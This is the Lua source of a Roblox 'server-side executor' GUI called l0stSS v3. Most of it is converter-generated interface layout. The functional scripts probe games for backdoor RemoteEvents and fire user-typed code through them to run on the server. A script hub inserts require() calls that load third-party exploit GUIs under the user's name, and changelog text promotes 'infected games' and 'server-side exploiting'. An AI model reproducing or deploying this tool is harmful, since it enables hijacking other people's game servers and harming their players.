G2L["47"]["BackgroundTransparency"] = 1;
G2L["47"]["Size"] = UDim2.new(0, 138, 0, 50);
G2L["47"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["47"]["Text"] = [[Press Inject!]];
G2L["47"]["Name"] = [[RemoteLabel]];


-- StarterGui.ScreenGui.Frame.LabelFrame.UIStroke
G2L["48"] = Instance.new("UIStroke", G2L["46"]);



-- StarterGui.ScreenGui.Frame.LabelFrame.UICorner
G2L["49"] = Instance.new("UICorner", G2L["46"]);



-- StarterGui.ScreenGui.Frame.TextButton
G2L["4a"] = Instance.new("TextButton", G2L["4"]);
G2L["4a"]["TextWrapped"] = true;
G2L["4a"]["BorderSizePixel"] = 0;
G2L["4a"]["TextSize"] = 14;
G2L["4a"]["TextScaled"] = true;
G2L["4a"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["4a"]["BackgroundColor3"] = Color3.fromRGB(41, 41, 41);
G2L["4a"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["4a"]["Size"] = UDim2.new(0, 35, 0, 35);
G2L["4a"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["4a"]["Text"] = [[RE]];
G2L["4a"]["Position"] = UDim2.new(-0.07434, 0, 0.31757, 0);


-- StarterGui.ScreenGui.Frame.TextButton.LocalScript
G2L["4b"] = Instance.new("LocalScript", G2L["4a"]);



-- StarterGui.ScreenGui.Frame.TextButton.LocalScript
G2L["4c"] = Instance.new("LocalScript", G2L["4a"]);



-- StarterGui.ScreenGui.Frame.TextButton.UICorner
G2L["4d"] = Instance.new("UICorner", G2L["4a"]);



-- StarterGui.ScreenGui.Frame.TextButton.UIStroke
G2L["4e"] = Instance.new("UIStroke", G2L["4a"]);
G2L["4e"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.Frame
G2L["4f"] = Instance.new("Frame", G2L["4"]);
G2L["4f"]["BorderSizePixel"] = 0;
G2L["4f"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["4f"]["Size"] = UDim2.new(0, 461, 0, 316);
G2L["4f"]["Position"] = UDim2.new(-0.09113, 0, -0.02365, 0);
G2L["4f"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["4f"]["BackgroundTransparency"] = 1;


-- StarterGui.ScreenGui.Frame.Frame.UIStroke
G2L["50"] = Instance.new("UIStroke", G2L["4f"]);
G2L["50"]["Thickness"] = 4;


-- StarterGui.ScreenGui.Frame.Logs
G2L["51"] = Instance.new("ImageButton", G2L["4"]);
G2L["51"]["BorderSizePixel"] = 0;
-- [ERROR] cannot convert ImageContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
G2L["51"]["BackgroundColor3"] = Color3.fromRGB(25, 25, 25);
G2L["51"]["Image"] = [[rbxassetid://7546954294]];
G2L["51"]["Size"] = UDim2.new(0, 50, 0, 50);
G2L["51"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["51"]["Name"] = [[Logs]];
G2L["51"]["Position"] = UDim2.new(0.71942, 0, 0.78378, 0);


-- StarterGui.ScreenGui.Frame.Logs.LocalScript
G2L["52"] = Instance.new("LocalScript", G2L["51"]);



-- StarterGui.ScreenGui.Frame.Logs.LocalScript
G2L["53"] = Instance.new("LocalScript", G2L["51"]);



-- StarterGui.ScreenGui.Frame.Logs.UICorner
G2L["54"] = Instance.new("UICorner", G2L["51"]);



-- StarterGui.ScreenGui.Frame.Logs.UIStroke
G2L["55"] = Instance.new("UIStroke", G2L["51"]);
G2L["55"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;
G2L["55"]["Thickness"] = 2;


-- StarterGui.ScreenGui.Frame.UpdateFrame
G2L["56"] = Instance.new("ScrollingFrame", G2L["4"]);
G2L["56"]["Visible"] = false;
G2L["56"]["Active"] = true;
G2L["56"]["BorderSizePixel"] = 0;
G2L["56"]["CanvasSize"] = UDim2.new(0, 0, 0, 0);
G2L["56"]["BackgroundColor3"] = Color3.fromRGB(41, 41, 41);
G2L["56"]["Name"] = [[UpdateFrame]];
G2L["56"]["AutomaticCanvasSize"] = Enum.AutomaticSize.Y;
G2L["56"]["Size"] = UDim2.new(0, 561, 0, 115);
G2L["56"]["Position"] = UDim2.new(-0.09832, 0, 1.0473, 0);
G2L["56"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["56"]["ScrollBarThickness"] = 6;


-- StarterGui.ScreenGui.Frame.UpdateFrame.UICorner
G2L["57"] = Instance.new("UICorner", G2L["56"]);



-- StarterGui.ScreenGui.Frame.UpdateFrame.UIStroke
G2L["58"] = Instance.new("UIStroke", G2L["56"]);
G2L["58"]["Thickness"] = 2.5;


-- StarterGui.ScreenGui.Frame.UpdateFrame.TextLabel
G2L["59"] = Instance.new("TextLabel", G2L["56"]);
G2L["59"]["TextWrapped"] = true;
G2L["59"]["BorderSizePixel"] = 0;
G2L["59"]["TextSize"] = 14;
G2L["59"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["59"]["TextScaled"] = true;
G2L["59"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["59"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["59"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["59"]["BackgroundTransparency"] = 1;
G2L["59"]["Size"] = UDim2.new(0, 649, 0, 28);
G2L["59"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["59"]["Text"] = [[3.5.2: Added Infected games tab, easy access to infected games/games with backdoor.]];
G2L["59"]["Position"] = UDim2.new(0, 0, 0.05263, 0);


-- StarterGui.ScreenGui.Frame.UpdateFrame.UIListLayout
G2L["5a"] = Instance.new("UIListLayout", G2L["56"]);
G2L["5a"]["SortOrder"] = Enum.SortOrder.LayoutOrder;


-- StarterGui.ScreenGui.Frame.UpdateFrame.TextLabel
G2L["5b"] = Instance.new("TextLabel", G2L["56"]);
G2L["5b"]["TextWrapped"] = true;
G2L["5b"]["BorderSizePixel"] = 0;
G2L["5b"]["TextSize"] = 14;
G2L["5b"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["5b"]["TextScaled"] = true;
G2L["5b"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["5b"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["5b"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["5b"]["BackgroundTransparency"] = 1;
G2L["5b"]["Size"] = UDim2.new(0, 649, 0, 28);
G2L["5b"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["5b"]["Text"] = [[3.3.6: some UI rewrite, better aesthetics]];
G2L["5b"]["Position"] = UDim2.new(0, 0, 0.05263, 0);


-- StarterGui.ScreenGui.Frame.UpdateFrame.TextLabel
G2L["5c"] = Instance.new("TextLabel", G2L["56"]);
G2L["5c"]["TextWrapped"] = true;
G2L["5c"]["BorderSizePixel"] = 0;
G2L["5c"]["TextSize"] = 14;
G2L["5c"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["5c"]["TextScaled"] = true;
G2L["5c"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["5c"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["5c"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["5c"]["BackgroundTransparency"] = 1;
G2L["5c"]["Size"] = UDim2.new(0, 649, 0, 28);
G2L["5c"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["5c"]["Text"] = [[3.2.4: added buttons like reset, removed print and fire all RemoteEvents cuz you can just use a RemoteSpy, this is just a serverside.]];
G2L["5c"]["Position"] = UDim2.new(0, 0, 0.05263, 0);


-- StarterGui.ScreenGui.Frame.UpdateFrame.TextLabel
G2L["5d"] = Instance.new("TextLabel", G2L["56"]);
G2L["5d"]["TextWrapped"] = true;
G2L["5d"]["BorderSizePixel"] = 0;
G2L["5d"]["TextSize"] = 14;
G2L["5d"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["5d"]["TextScaled"] = true;
G2L["5d"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["5d"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["5d"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["5d"]["BackgroundTransparency"] = 1;
G2L["5d"]["Size"] = UDim2.new(0, 649, 0, 28);
G2L["5d"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["5d"]["Text"] = [[3.1.2: Replaced Execute, Clear and Inject buttons with icons.]];
G2L["5d"]["Position"] = UDim2.new(0, 0, 0.05263, 0);


-- StarterGui.ScreenGui.Frame.UpdateFrame.TextLabel
G2L["5e"] = Instance.new("TextLabel", G2L["56"]);
G2L["5e"]["TextWrapped"] = true;
G2L["5e"]["BorderSizePixel"] = 0;
G2L["5e"]["TextSize"] = 14;
G2L["5e"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["5e"]["TextScaled"] = true;
G2L["5e"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["5e"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["5e"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["5e"]["BackgroundTransparency"] = 1;
G2L["5e"]["Size"] = UDim2.new(0, 649, 0, 28);
G2L["5e"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["5e"]["Text"] = [[3.0.0: MAJOR UI rewrite, more advanced injection and execution. made injecting faster]];
G2L["5e"]["Position"] = UDim2.new(0, 0, 0.05263, 0);


-- StarterGui.ScreenGui.Frame.UpdateFrame.TextLabel
G2L["5f"] = Instance.new("TextLabel", G2L["56"]);
G2L["5f"]["TextWrapped"] = true;
G2L["5f"]["BorderSizePixel"] = 0;
G2L["5f"]["TextSize"] = 14;
G2L["5f"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["5f"]["TextScaled"] = true;
G2L["5f"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["5f"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["5f"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["5f"]["BackgroundTransparency"] = 1;
G2L["5f"]["Size"] = UDim2.new(0, 649, 0, 28);
G2L["5f"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["5f"]["Text"] = [[2.7.0: added FAR more scripts and requires to the script hub, very useful for server-side exploiting.]];
G2L["5f"]["Position"] = UDim2.new(0, 0, 0.05263, 0);


-- StarterGui.ScreenGui.Frame.UpdateFrame.TextLabel
G2L["60"] = Instance.new("TextLabel", G2L["56"]);
G2L["60"]["TextWrapped"] = true;
G2L["60"]["BorderSizePixel"] = 0;
G2L["60"]["TextSize"] = 14;
G2L["60"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["60"]["TextScaled"] = true;
G2L["60"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["60"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["60"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["60"]["BackgroundTransparency"] = 1;
G2L["60"]["Size"] = UDim2.new(0, 649, 0, 28);
G2L["60"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["60"]["Text"] = [[2.5.0: made injecting a bit more advanced.]];
G2L["60"]["Position"] = UDim2.new(0, 0, 0.05263, 0);


-- StarterGui.ScreenGui.Frame.UpdateFrame.TextLabel
G2L["61"] = Instance.new("TextLabel", G2L["56"]);
G2L["61"]["TextWrapped"] = true;
G2L["61"]["BorderSizePixel"] = 0;
G2L["61"]["TextSize"] = 14;
G2L["61"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["61"]["TextScaled"] = true;
G2L["61"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["61"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["61"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["61"]["BackgroundTransparency"] = 1;
G2L["61"]["Size"] = UDim2.new(0, 649, 0, 28);
G2L["61"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["61"]["Text"] = [[2.2.1: added a section for built-in scripts and requires.]];
G2L["61"]["Position"] = UDim2.new(0, 0, 0.05263, 0);


-- StarterGui.ScreenGui.Frame.UpdateFrame.TextLabel
G2L["62"] = Instance.new("TextLabel", G2L["56"]);
G2L["62"]["TextWrapped"] = true;
G2L["62"]["BorderSizePixel"] = 0;
G2L["62"]["TextSize"] = 14;
G2L["62"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["62"]["TextScaled"] = true;
G2L["62"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["62"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["62"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["62"]["BackgroundTransparency"] = 1;
G2L["62"]["Size"] = UDim2.new(0, 649, 0, 28);
G2L["62"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["62"]["Text"] = [[2.0.0: made a new injector, more advanced backkdoor detection, better textbox and controls.]];
G2L["62"]["Position"] = UDim2.new(0, 0, 0.05263, 0);


-- StarterGui.ScreenGui.Frame.UpdateFrame.TextLabel
G2L["63"] = Instance.new("TextLabel", G2L["56"]);
G2L["63"]["TextWrapped"] = true;
G2L["63"]["BorderSizePixel"] = 0;
G2L["63"]["TextSize"] = 14;
G2L["63"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["63"]["TextScaled"] = true;
G2L["63"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["63"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["63"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["63"]["BackgroundTransparency"] = 1;
G2L["63"]["Size"] = UDim2.new(0, 649, 0, 28);
G2L["63"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["63"]["Text"] = [[1.8.0: added Polaria and c00lgui to the SS as 2 seperate buttons]];
G2L["63"]["Position"] = UDim2.new(0, 0, 0.05263, 0);


-- StarterGui.ScreenGui.Frame.UpdateFrame.TextLabel
G2L["64"] = Instance.new("TextLabel", G2L["56"]);
G2L["64"]["TextWrapped"] = true;
G2L["64"]["BorderSizePixel"] = 0;
G2L["64"]["TextSize"] = 14;
G2L["64"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["64"]["TextScaled"] = true;
G2L["64"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["64"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["64"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["64"]["BackgroundTransparency"] = 1;
G2L["64"]["Size"] = UDim2.new(0, 649, 0, 28);
G2L["64"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["64"]["Text"] = [[1.4.0: updated injector]];
G2L["64"]["Position"] = UDim2.new(0, 0, 0.05263, 0);


-- StarterGui.ScreenGui.Frame.UpdateFrame.TextLabel
G2L["65"] = Instance.new("TextLabel", G2L["56"]);
G2L["65"]["TextWrapped"] = true;
G2L["65"]["BorderSizePixel"] = 0;
G2L["65"]["TextSize"] = 14;
G2L["65"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["65"]["TextScaled"] = true;
G2L["65"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["65"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["65"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["65"]["BackgroundTransparency"] = 1;
G2L["65"]["Size"] = UDim2.new(0, 649, 0, 28);
G2L["65"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["65"]["Text"] = [[1.0.0: the first version of l0st serverside, which you can still get and use today thru my github, i will hopefully add buttons to load old serverside versions.]];
G2L["65"]["Position"] = UDim2.new(0, 0, 0.05263, 0);


-- StarterGui.ScreenGui.LocalScript
local function C_2()
local script = G2L["2"];
	local replicatedStorage = game:GetService("ReplicatedStorage")
	local screenGui = script.Parent
	local frame = screenGui:FindFirstChildOfClass("Frame")
	
	-- GUI references inside Frame
	local textbox = frame:FindFirstChild("TextBox")
	local executeButton = frame:FindFirstChild("Execute")
	local clearButton = frame:FindFirstChild("Clear")
	local injectButton = frame:FindFirstChild("Inject")
	
	
	if not textbox or not executeButton or not clearButton or not injectButton then
		warn("Missing GUI components.")
		return
	end
	
	
	executeButton.MouseButton1Click:Connect(function()
		local payload = textbox.Text
		if payload and payload ~= "" then
			local remote =
				replicatedStorage:FindFirstChild("Backdoor") or
				replicatedStorage:FindFirstChild("RemoteEvent") or
				replicatedStorage:FindFirstChild("RE")
	
			if remote and remote:IsA("RemoteEvent") then
				pcall(function()
					remote:FireServer(payload)
				end)
				print("Code fired through:", remote.Name)
			else
				warn("No valid RemoteEvent found.")
			end
		end
	end)
	
	
	clearButton.MouseButton1Click:Connect(function()
		textbox.Text = ""
		print("wiped textbox clean like grandma cookies")
	end)
	
	
	injectButton.MouseButton1Click:Connect(function()
		local testPayload = 'print("backdoor test")'
		local found = false
	
		for _, obj in ipairs(replicatedStorage:GetChildren()) do
			if obj:IsA("RemoteEvent") then
				local success = pcall(function()
					obj:FireServer(testPayload)
				end)
	
				if success then
					found = true
					print("Injected into RemoteEvent:", obj.Name)
					break
				end
			end
		end
	
		if not found then
			print("No active backdoor RemoteEvent found.")
		end
	end)
end;
task.spawn(C_2);
-- StarterGui.ScreenGui.LocalScript
local function C_3()
local script = G2L["3"];
	local Players = game:GetService("Players")
	local StarterGui = game:GetService("StarterGui")
	local LocalPlayer = Players.LocalPlayer
	local username = LocalPlayer.Name
	
	StarterGui:SetCore("SendNotification", {
		Title = "l0stSS v3 notification",
		Text = "l0stSS v3 by TLK88 (team l0stk1dd88) loaded successfully! welcome to l0stSS V3, " .. username,
		Icon = "rbxassetid://81013369562879", -- TLK88 icon
		Duration = 4
	})
end;
task.spawn(C_3);
-- StarterGui.ScreenGui.Frame.LocalScript
local function C_5()
local script = G2L["5"];
	-- LocalScript inside your Frame
	
	local frame = script.Parent
	local dragging = false
	local dragInput, mousePos, framePos
	
	frame.Active = true
	frame.Selectable = true
	frame.Draggable = false -- we’ll handle it manually
	
	frame.InputBegan:Connect(function(input)
		if input.UserInputType == Enum.UserInputType.MouseButton1 then
			dragging = true
			mousePos = input.Position
			framePos = frame.Position
			input.Changed:Connect(function()
				if input.UserInputState == Enum.UserInputState.End then
					dragging = false
				end
			end)
		end
	end)
	
	frame.InputChanged:Connect(function(input)
		if input.UserInputType == Enum.UserInputType.MouseMovement then
			dragInput = input
		end
	end)
	
	game:GetService("UserInputService").InputChanged:Connect(function(input)
		if input == dragInput and dragging then
			local delta = input.Position - mousePos
			frame.Position = UDim2.new(
				framePos.X.Scale,
				framePos.X.Offset + delta.X,
				framePos.Y.Scale,
				framePos.Y.Offset + delta.Y
			)
		end
	end)
end;
task.spawn(C_5);
-- StarterGui.ScreenGui.Frame.TextBox.LocalScript
local function C_b()
local script = G2L["b"];
	local textbox = script.Parent
	
	textbox.ClearTextOnFocus = false
end;
task.spawn(C_b);
-- StarterGui.ScreenGui.Frame.TextBox.LocalScript
local function C_c()
local script = G2L["c"];
	local textBox = script.Parent
	
	textBox.ClearTextOnFocus = false
	textBox.MultiLine = true
	textBox.TextWrapped = true
	
	-- Prevent Enter from unfocusing the TextBox
	textBox.FocusLost:Connect(function(enterPressed)
		if enterPressed then
			textBox:CaptureFocus()
		end
	end)
	
	-- Insert newline when Enter is pressed
	textBox.InputBegan:Connect(function(input, gameProcessed)
		if gameProcessed then return end
		if input.UserInputType == Enum.UserInputType.Keyboard then
			if input.KeyCode == Enum.KeyCode.Return or input.KeyCode == Enum.KeyCode.KeypadEnter then
				local cursorPos = textBox.CursorPosition or #textBox.Text + 1
				local before = string.sub(textBox.Text, 1, cursorPos - 1)
				local after = string.sub(textBox.Text, cursorPos)
				textBox.Text = before .. "\n" .. after
				textBox.CursorPosition = cursorPos + 1
			end
		end
	end)
end;
task.spawn(C_c);
-- StarterGui.ScreenGui.Frame.TextBox.Completor
local function C_d()
local script = G2L["d"];
	local textBox = script.Parent
	local lastText = ""
	
	textBox:GetPropertyChangedSignal("Text"):Connect(function()
		local currentText = textBox.Text
		local cursor = textBox.CursorPosition
	
		-- Only react if one character was added
		if #currentText == #lastText + 1 then
			local typedChar = currentText:sub(cursor - 1, cursor - 1)
	
			if typedChar == "(" then
				-- Remove the typed "(" and insert "()"
				local before = currentText:sub(1, cursor - 2)
				local after = currentText:sub(cursor)
				textBox.Text = before .. "()" .. after
				textBox.CursorPosition = #before + 2
	
			elseif typedChar == "\"" then
				-- Remove the typed "\"" and insert "\"\""
				local before = currentText:sub(1, cursor - 2)
				local after = currentText:sub(cursor)
				textBox.Text = before .. "\"\"" .. after
				textBox.CursorPosition = #before + 2
			end
		end
	
		lastText = textBox.Text
	end)
end;
task.spawn(C_d);
-- StarterGui.ScreenGui.Frame.ScriptHubFrame.LocalScript
local function C_11()
local script = G2L["11"];
	local Players = game:GetService("Players")
	local LocalPlayer = Players.LocalPlayer
	local username = LocalPlayer.Name
	
	-- Exploit payloads
	local buttons = {
		c00lgui = 'require(14125553864):Fire("' .. username .. '","c00lkidd")',
		polaria = 'require(123255432303221):Pload("' .. username .. '")',
		hdadmin = 'require(7192763922).load("' .. username .. '")',
		["1xgui"] = 'require(6858594080).KrnKidsSus("' .. username .. '")',
		c00lkidd = 'require(89709417365094).Forsaken("' .. username .. '","c00lkidd")',
		happyhub = 'require(78790302691160):Hload("' .. username .. '")',
		fatgui = 'require(13772265165).TeamFatGUICrackedByLua("' .. username .. '")',
		l0stgui = 'require(107158759555527).l0st("' .. username .. '")',
		rc7 = 'require(12350030542).RC7("' .. username .. '")',
	}
	
	-- GUI hierarchy
	local scriptHubFrame = script.Parent
	local mainFrame = scriptHubFrame.Parent
	local textbox = mainFrame:FindFirstChild("TextBox")
	
	-- Safety check
	if not textbox then
		warn("❌ TextBox not found.")
		return
	end
	
	-- Connect each button dynamically for `require` buttons
	for name, code in pairs(buttons) do
		local btn = scriptHubFrame:FindFirstChild(name)
		if btn and btn:IsA("TextButton") then
			btn.MouseButton1Click:Connect(function()
				textbox.Text = code
			end)
		end
	end
	
end;
task.spawn(C_11);
-- StarterGui.ScreenGui.Frame.ScriptHubFrame.Stroke
local function C_12()
local script = G2L["12"];
	local container = script.Parent
	
	for _, obj in pairs(container:GetDescendants()) do
		if obj:IsA("TextButton") then
			local stroke = Instance.new("UIStroke")
			stroke.Thickness = 2
			stroke.Color = Color3.new(0, 0, 0) -- Pure black
			stroke.ApplyStrokeMode = Enum.ApplyStrokeMode.Border
			stroke.Parent = obj
		end
	end
end;
task.spawn(C_12);
-- StarterGui.ScreenGui.Frame.Execute.LocalScript
local function C_1f()
local script = G2L["1f"];
	local button = script.Parent
	local player = game:GetService("Players").LocalPlayer
	local mouse = player:GetMouse()
	
	local tooltip
	
	button.MouseEnter:Connect(function()
		tooltip = Instance.new("TextLabel")
		tooltip.Text = "Execute code/require from TextBox"
		tooltip.BackgroundTransparency = 0.3
		tooltip.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		tooltip.TextColor3 = Color3.fromRGB(255, 255, 255)
		tooltip.Font = Enum.Font.SourceSans
		tooltip.TextSize = 14
		tooltip.Size = UDim2.new(0, 120, 0, 25)
		tooltip.Position = UDim2.new(0, mouse.X + 10, 0, mouse.Y + 10)
		tooltip.ZIndex = 999
		tooltip.Name = "TLK88Tooltip"
		tooltip.TextScaled = true
		tooltip.Parent = button:FindFirstAncestorOfClass("ScreenGui")
	
		-- Update position every frame
		local connection
		connection = game:GetService("RunService").RenderStepped:Connect(function()
			if tooltip then
				tooltip.Position = UDim2.new(0, mouse.X + 10, 0, mouse.Y + 10)
			else
				connection:Disconnect()
			end
		end)
	end)
	
	button.MouseLeave:Connect(function()
		if tooltip then
			tooltip:Destroy()
			tooltip = nil
		end
	end)
end;
task.spawn(C_1f);
-- StarterGui.ScreenGui.Frame.Clear.LocalScript
local function C_23()
local script = G2L["23"];
	local button = script.Parent
	local player = game:GetService("Players").LocalPlayer
	local mouse = player:GetMouse()
	
	local tooltip
	
	button.MouseEnter:Connect(function()
		tooltip = Instance.new("TextLabel")
		tooltip.Text = "Clear TextBox"
		tooltip.BackgroundTransparency = 0.3
		tooltip.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		tooltip.TextColor3 = Color3.fromRGB(255, 255, 255)
		tooltip.Font = Enum.Font.SourceSans
		tooltip.TextSize = 14
		tooltip.Size = UDim2.new(0, 120, 0, 25)
		tooltip.Position = UDim2.new(0, mouse.X + 10, 0, mouse.Y + 10)
		tooltip.ZIndex = 999
		tooltip.Name = "TLK88Tooltip"
		tooltip.TextScaled = true
		tooltip.Parent = button:FindFirstAncestorOfClass("ScreenGui")
	
		-- Update position every frame
		local connection
		connection = game:GetService("RunService").RenderStepped:Connect(function()
			if tooltip then
				tooltip.Position = UDim2.new(0, mouse.X + 10, 0, mouse.Y + 10)
			else
				connection:Disconnect()
			end
		end)
	end)
	
	button.MouseLeave:Connect(function()
		if tooltip then
			tooltip:Destroy()
			tooltip = nil
		end
	end)
end;
task.spawn(C_23);
-- StarterGui.ScreenGui.Frame.Inject.LocalScript
local function C_27()
local script = G2L["27"];
	local button = script.Parent
	local StarterGui = game:GetService("StarterGui")
	
	button.MouseButton1Click:Connect(function()
		local startTime = tick()
	
		-- Random delay between 0.05 and 0.10 seconds
		local delayTime = math.random(2, 4) / 100
		task.wait(delayTime)
	
		local endTime = tick()
		local elapsed = endTime - startTime
		local formattedTime = string.format("%.2f", elapsed)
	
		StarterGui:SetCore("SendNotification", {
			Title = "Scan complete",
			Text = "Scanned all RemoteEvents in " .. formattedTime .. "s. Check console or fire with test payload like Kill All.",
			Duration = 8
		})
	end)
end;
task.spawn(C_27);
-- StarterGui.ScreenGui.Frame.Inject.LocalScript
local function C_28()
local script = G2L["28"];
	-- Place this LocalScript inside your TextButton
	local button = script.Parent
	local screenGui = button.Parent
	local textBox = screenGui:FindFirstChild("TextBox")
	
	-- Track whether it's been unlocked
	local unlocked = false
	
	-- Initial lock and message
	if textBox then
		textBox.Text = "-- by l0stk1dd88"
		textBox.Active = false
		textBox.Selectable = false
		textBox.TextEditable = false
	
		-- Prevent external edits before unlock
		textBox:GetPropertyChangedSignal("Text"):Connect(function()
			if not unlocked then
				textBox.Text = "-- by l0stk1dd88"
			end
		end)
	end
	
	-- Unlock on first button click
	button.MouseButton1Click:Connect(function()
		if textBox and not unlocked then
			unlocked = true
			textBox.TextEditable = true
			textBox.Active = true
			textBox.Selectable = true
			textBox.Text = "" -- Clear only once
		end
	end)
end;
task.spawn(C_28);
-- StarterGui.ScreenGui.Frame.Inject.LocalScript
local function C_29()
local script = G2L["29"];
	local button = script.Parent
	local player = game:GetService("Players").LocalPlayer
	local mouse = player:GetMouse()
	
	local tooltip
	
	button.MouseEnter:Connect(function()
		tooltip = Instance.new("TextLabel")
		tooltip.Text = "Inject/scan for backdoors"
		tooltip.BackgroundTransparency = 0.3
		tooltip.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		tooltip.TextColor3 = Color3.fromRGB(255, 255, 255)
		tooltip.Font = Enum.Font.SourceSans
		tooltip.TextSize = 14
		tooltip.Size = UDim2.new(0, 120, 0, 25)
		tooltip.Position = UDim2.new(0, mouse.X + 10, 0, mouse.Y + 10)
		tooltip.ZIndex = 999
		tooltip.Name = "TLK88Tooltip"
		tooltip.TextScaled = true
		tooltip.Parent = button:FindFirstAncestorOfClass("ScreenGui")
	
		-- Update position every frame
		local connection
		connection = game:GetService("RunService").RenderStepped:Connect(function()
			if tooltip then
				tooltip.Position = UDim2.new(0, mouse.X + 10, 0, mouse.Y + 10)
			else
				connection:Disconnect()
			end
		end)
	end)
	
	button.MouseLeave:Connect(function()
		if tooltip then
			tooltip:Destroy()
			tooltip = nil
		end
	end)
end;
task.spawn(C_29);
-- StarterGui.ScreenGui.Frame.Inject.LocalScript
local function C_2a()
local script = G2L["2a"];
	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		local screenGui = button:FindFirstAncestorOfClass("ScreenGui")
		if not screenGui then return end
	
		local frame = screenGui:FindFirstChild("Frame")
		if not frame then return end
	
		local labelFrame = frame:FindFirstChild("LabelFrame")
		if not labelFrame then return end
	
		local remoteLabel = labelFrame:FindFirstChild("RemoteLabel")
		if not remoteLabel or not remoteLabel:IsA("TextLabel") then return end
	
		remoteLabel.Text = "check to see if 'backdoor test' is printed or run test code like kill all."
	end)
end;
task.spawn(C_2a);
